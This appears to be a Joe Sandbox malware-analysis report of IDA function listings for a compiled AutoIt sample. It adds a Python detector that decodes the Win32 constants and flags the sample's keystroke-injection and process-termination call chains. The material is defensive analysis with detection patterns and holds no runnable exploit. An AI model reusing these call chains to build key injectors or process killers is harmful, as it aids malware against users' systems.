                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 8b23c1626e3ac3ff65fb641cc930949ccc970fef8e0d13e68a1e402309523a18
                                                                    • Instruction ID: c5b06ff83c779dde5d6ff82a00e3354852451d86fd312557916b897b510eca49
                                                                    • Opcode Fuzzy Hash: 8b23c1626e3ac3ff65fb641cc930949ccc970fef8e0d13e68a1e402309523a18
                                                                    • Instruction Fuzzy Hash: E501BFB6254304FFE710AB65DC4DF573B6CEB89B11F404425FA05DB191CA709840DB20
                                                                    APIs
                                                                      • Part of subcall function 0094D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0094D501
                                                                      • Part of subcall function 0094D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0094D50F
                                                                      • Part of subcall function 0094D4DC: CloseHandle.KERNEL32(00000000), ref: 0094D5DC
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096A16D
                                                                    • GetLastError.KERNEL32 ref: 0096A180
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096A1B3
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0096A268
                                                                    • GetLastError.KERNEL32(00000000), ref: 0096A273
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096A2C4
                                                                     Memory Dump Source
                                                                     • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: 5e65ab6c22b34665261b1d46bda6d1a105197e365d36d363e0fc3628061cb1db
                                                                    • Instruction ID: ee0a297b16cbb9a84607fe3d43ee97921810ef675fdc45366d329401e4758ded
                                                                    • Opcode Fuzzy Hash: 5e65ab6c22b34665261b1d46bda6d1a105197e365d36d363e0fc3628061cb1db
                                                                    • Instruction Fuzzy Hash: 5F61DE712082429FD320DF19C894F16BBE5AF45318F14849CE46A9B7A3C776EC85CF92
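The two listings above, the key-injection routine around 009425B3 (GetWindowThreadProcessId, AttachThreadInput, then PostMessageW with message 0x100/0x101 and wParam 0x25/0x27) and the process-kill routine around 0096A16D (Toolhelp snapshot, OpenProcess with access mask 0x00000001, TerminateProcess, string SeDebugPrivilege), read much more easily once the Win32 constants are named: 0x100 is WM_KEYDOWN, 0x101 is WM_KEYUP, 0x25 and 0x27 are VK_LEFT and VK_RIGHT, and access mask 0x1 is PROCESS_TERMINATE. Both chains are what the AutoIt runtime's send-keys and process-close routines look like, consistent with the "compiled AutoIt script" signature on this sample, and the argument values are the IDA plugin's static resolution of the disassembly ("?" where it could not resolve one), not values captured at run time. The Python below is an added example, not Joe Sandbox output or AutoIt code: it parses API lines in this report's format, decodes those constants, and flags each behaviour only when its whole chain is present. The two sample entries are abridged copies of the listings above and the constant values are the Win32 SDK definitions.

```python
"""Decode Joe Sandbox "APIs" listings and flag the two chains in the entries above:
key injection (AttachThreadInput + PostMessageW WM_KEYDOWN) and kill-by-name
(Toolhelp enumeration + OpenProcess(PROCESS_TERMINATE) + TerminateProcess).
Added example, not Joe Sandbox or AutoIt code; constants are Win32 SDK values."""
import re
from dataclasses import dataclass
from typing import Optional

WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR"}
VIRTUAL_KEYS = {0x25: "VK_LEFT", 0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION"}

# "• Name.MODULE(args), ref: ADDR"; the subcall prefix and the argument list are optional.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list              # one int per argument, None where the plugin printed "?"
    ref: int
    subcall: Optional[int]  # callee address when the line reads "Part of subcall function"

    def arg(self, i: int) -> Optional[int]:
        return self.args[i] if i < len(self.args) else None


def parse_api_lines(entry: str) -> list:
    """Parse every API line of one function entry; other lines are skipped."""
    calls = []
    for m in filter(None, map(API_LINE.match, entry.splitlines())):
        raw = m.group("args") or ""
        args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",") if a.strip()]
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), sub))
    return calls


def flags(value: int, table: dict) -> str:
    """Render an access mask as NAME|NAME; bits the table does not know stay hex."""
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"


def describe(call: ApiCall) -> str:
    """One call with the constants that matter here decoded."""
    if call.name in ("PostMessageW", "SendMessageW") and call.arg(1) in WINDOW_MESSAGES:
        wparam = call.arg(2)
        key = VIRTUAL_KEYS.get(wparam) or ("?" if wparam is None else hex(wparam))
        return f"{call.name}(hwnd, {WINDOW_MESSAGES[call.arg(1)]}, {key})"
    if call.name == "OpenProcess" and call.arg(0) is not None:
        return f"OpenProcess({flags(call.arg(0), PROCESS_ACCESS)}, ..., pid)"
    return f"{call.name}({', '.join('?' if a is None else hex(a) for a in call.args)})"


def find_chains(calls: list) -> list:
    """One finding per behaviour whose complete chain is present in the entry."""
    names = {c.name for c in calls}
    findings = []
    keydown = [c for c in calls if c.name in ("PostMessageW", "SendMessageW")
               and c.arg(1) == 0x0100 and c.arg(2) is not None]
    if "AttachThreadInput" in names and keydown:
        keys = sorted({VIRTUAL_KEYS.get(c.arg(2), hex(c.arg(2))) for c in keydown})
        findings.append("keystroke injection into another thread's window: " + ", ".join(keys))
    kill_opens = [c for c in calls if c.name == "OpenProcess"
                  and c.arg(0) is not None and c.arg(0) & 0x0001]
    if (names & {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}
            and kill_opens and "TerminateProcess" in names):
        findings.append("process enumeration, OpenProcess(PROCESS_TERMINATE), TerminateProcess: kill by name")
    return findings


# Constructed input: abridged copies of the two function entries in this report.
KEYSTROKE_ENTRY = """\
  • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
  • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 009425BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009425DB
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00942601
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00942623
"""
KILL_ENTRY = """\
  • Part of subcall function 0094D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0094D501
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096A16D
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0096A268
• CloseHandle.KERNEL32(00000000), ref: 0096A2C4
"""

if __name__ == "__main__":
    for label, entry in (("send-keys", KEYSTROKE_ENTRY), ("process-close", KILL_ENTRY)):
        calls = parse_api_lines(entry)
        print(label, *("    " + describe(c) for c in calls), sep="\n")
        print(*("  ! " + f for f in find_chains(calls)), sep="\n")
```

Run as a script it prints each decoded call followed by the findings for the entry. Requiring the whole chain rather than any single API is deliberate: OpenProcess or PostMessageW alone appears in ordinary GUI code, and on an entry such as the LoadIconW or menu functions further down the script reports nothing.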
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00973925
                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0097393A
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00973954
                                                                    • _wcslen.LIBCMT ref: 00973999
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 009739C6
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009739F4
                                                                     Memory Dump Source
                                                                     • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcslen
                                                                    • String ID: SysListView32
                                                                    • API String ID: 2147712094-78025650
                                                                    • Opcode ID: 4091f6cf11f61ddf7261f932291889a28397767dffac913df9eeed94e361f676
                                                                    • Instruction ID: 1d0878cbe4f299e479d267f78d83fe3d328364b0417873eb37236effa4003adb
                                                                    • Opcode Fuzzy Hash: 4091f6cf11f61ddf7261f932291889a28397767dffac913df9eeed94e361f676
                                                                    • Instruction Fuzzy Hash: 4841B472A00219ABDF219F64CC45BEA77A9FF48354F10852AF95CE7281D7719E80DB90
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0094BCFD
                                                                    • IsMenu.USER32(00000000), ref: 0094BD1D
                                                                    • CreatePopupMenu.USER32 ref: 0094BD53
                                                                    • GetMenuItemCount.USER32(00BB5748), ref: 0094BDA4
                                                                    • InsertMenuItemW.USER32(00BB5748,?,00000001,00000030), ref: 0094BDCC
                                                                     Memory Dump Source
                                                                     • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                    • String ID: 0$2
                                                                    • API String ID: 93392585-3793063076
                                                                    • Opcode ID: 28759877611d31fc32ea5161e87d57ce488fbd919cec623aea0caf94c78ba1d6
                                                                    • Instruction ID: ba3007f53e2314ba00246971bbba066a74d716c06cb4f94aba6ba1f38f157c76
                                                                    • Opcode Fuzzy Hash: 28759877611d31fc32ea5161e87d57ce488fbd919cec623aea0caf94c78ba1d6
                                                                    • Instruction Fuzzy Hash: 4451ADB0A042059BDF20CFA8D8C4FAEBBF8BF85314F144699E5559B2D0D770D945CB61
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 0094C913
                                                                     Memory Dump Source
                                                                     • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 753bc65ed854f73e721313474e12a26681213012a52e47c654dff5d20d71290b
                                                                    • Instruction ID: 046ae63edffb9cf5bd845eb527c79688382a1b9dfa0e7f07c4c2fb872752b632
                                                                    • Opcode Fuzzy Hash: 753bc65ed854f73e721313474e12a26681213012a52e47c654dff5d20d71290b
                                                                    • Instruction Fuzzy Hash: 651150B279A306BEE7046B14DD83DAE379CDF56318B10002EF500A62C2EB745E4053A4
                                                                     Memory Dump Source
                                                                     • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 642191829-3771769585
                                                                    • Opcode ID: 1600525a5812770507289a2b14824dcbaac5deeb2c1d80d0d6362e98de5e600f
                                                                    • Instruction ID: 9b631a888b7d37371317d47efed327b97956fec223ae11711b81650124e19dc1
                                                                    • Opcode Fuzzy Hash: 1600525a5812770507289a2b14824dcbaac5deeb2c1d80d0d6362e98de5e600f
                                                                    • Instruction Fuzzy Hash: 281106B6914104AFCB24AB64DC4AFEF77ACDF51B10F00016DF549AA0D1EF748A819B51
                                                                     Memory Dump Source
                                                                     • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 952045576-0
                                                                    • Opcode ID: 7c6516406858d943af740aa2782672d971007d286c1319abf17347d5b88b7bac
                                                                    • Instruction ID: 179d6086bdef115768d8ad02057f888e7a71903bd8d0b43763bc46c4571a934d
                                                                    • Opcode Fuzzy Hash: 7c6516406858d943af740aa2782672d971007d286c1319abf17347d5b88b7bac
                                                                    • Instruction Fuzzy Hash: 76419565C10118B9CB11EBF8C88AECFB7ACAF85710F508462F524E31A1FB34E255C7A5
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 008FF953
                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0093F3D1
                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0093F454
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 2a6223a158e03736168a09776d9157aa11085c0286079fae7b8a3ac17a56ff58
                                                                    • Instruction ID: 1ba65263f02dc769313b668341015d68cf7a71e19209ae0725908dd7f89dce2f
                                                                    • Opcode Fuzzy Hash: 2a6223a158e03736168a09776d9157aa11085c0286079fae7b8a3ac17a56ff58
                                                                    • Instruction Fuzzy Hash: 7D412831718688BAC7388B39899C73A7F95FF56314F54443CE38BD2672D6B2A880DB11
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00972D1B
                                                                    • GetDC.USER32(00000000), ref: 00972D23
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00972D2E
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00972D3A
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00972D76
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00972D87
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00975A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00972DC2
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00972DE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: 20f5b33ff54f85bccb53dda1c6c3049bd072cbc94ed5660906f070a1765979f5
                                                                    • Instruction ID: a788378a3a4594d6f91e43b24cc000862beed55d3b20706040d133286b87aaca
                                                                    • Opcode Fuzzy Hash: 20f5b33ff54f85bccb53dda1c6c3049bd072cbc94ed5660906f070a1765979f5
                                                                    • Instruction Fuzzy Hash: 8B317F72215214BFEB214F50CC89FEB3BADEF09715F044059FE0C9A291D6759C90C7A4
                                                                     Memory Dump Source
                                                                     • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    • Opcode ID: 151ac64215b54bd698233d230dbad1fe8c7919e5e1804dfb82bdbbcab58f45f6
                                                                    • Instruction ID: bd64fa21f1438fefc0509db32ba4cdffd49c168e15fe990b3c2c7d03085d6bf7
                                                                    • Opcode Fuzzy Hash: 151ac64215b54bd698233d230dbad1fe8c7919e5e1804dfb82bdbbcab58f45f6
                                                                    • Instruction Fuzzy Hash: EA21C672640A097BD61956608E92FFA339CBFA1788F564030FD08AA683F725ED11C5A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: 68dbde534afeebe13de9d5059085f15bb62c6c73dc5cafd1375016e65c764644
                                                                    • Instruction ID: 36aa3f599022bb9879afecbc62a5d84ac0b86a8355c7057b9fdbe3ed28537f72
                                                                    • Opcode Fuzzy Hash: 68dbde534afeebe13de9d5059085f15bb62c6c73dc5cafd1375016e65c764644
                                                                    • Instruction Fuzzy Hash: F1D1A471A0060AAFDF10CF98C891FAEB7B9FF88344F168469E915AB281E771DD45CB50
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(?,?), ref: 009215CE
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00921651
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009216E4
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 009216FB
                                                                      • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00921777
                                                                    • __freea.LIBCMT ref: 009217A2
                                                                    • __freea.LIBCMT ref: 009217AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                    • String ID:
                                                                    • API String ID: 2829977744-0
                                                                    • Opcode ID: f7ac8114283f27a69f59172d3fd30e957df2fbe72829345ba5f037ac5c4042bb
                                                                    • Instruction ID: e215617854fcbb395f20b45de2674414e2bb13b04f77c8e707a7c0c34ab2e5ba
                                                                    • Opcode Fuzzy Hash: f7ac8114283f27a69f59172d3fd30e957df2fbe72829345ba5f037ac5c4042bb
                                                                    • Instruction Fuzzy Hash: 6091D672E002269EDF208E74E841EEE7BBD9FA5310F184569F805E7149D735CD90CBA0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2610073882-625585964
                                                                    • Opcode ID: 0d6057d109eb2462feef127173543f70833257d2d9bb8dccd3b6d8a262d64989
                                                                    • Instruction ID: b673fc7c8a87323104c8f1637fe6281ea626306de1b5a1c17b21b0294b4c4b10
                                                                    • Opcode Fuzzy Hash: 0d6057d109eb2462feef127173543f70833257d2d9bb8dccd3b6d8a262d64989
                                                                    • Instruction Fuzzy Hash: 61917971A00219AFDF20CFA5CC89FAEBBB8EF86714F108559F515AB280D7709945CFA0
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0095125C
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00951284
                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009512A8
                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009512D8
                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0095135F
                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009513C4
                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00951430
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                    • String ID:
                                                                    • API String ID: 2550207440-0
                                                                    • Opcode ID: a97d3b15ecf7799d69454154d3460b65255689640482ef77e85c6011012a4da6
                                                                    • Instruction ID: bcd6e447ebadeff758e0525122711eeb6a971a84a24338d0013d19078bce2e3b
                                                                    • Opcode Fuzzy Hash: a97d3b15ecf7799d69454154d3460b65255689640482ef77e85c6011012a4da6
                                                                    • Instruction Fuzzy Hash: EE910871900209AFDB00DFAAC885BBE77B9FF45316F104429ED50E72A1D778E949CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
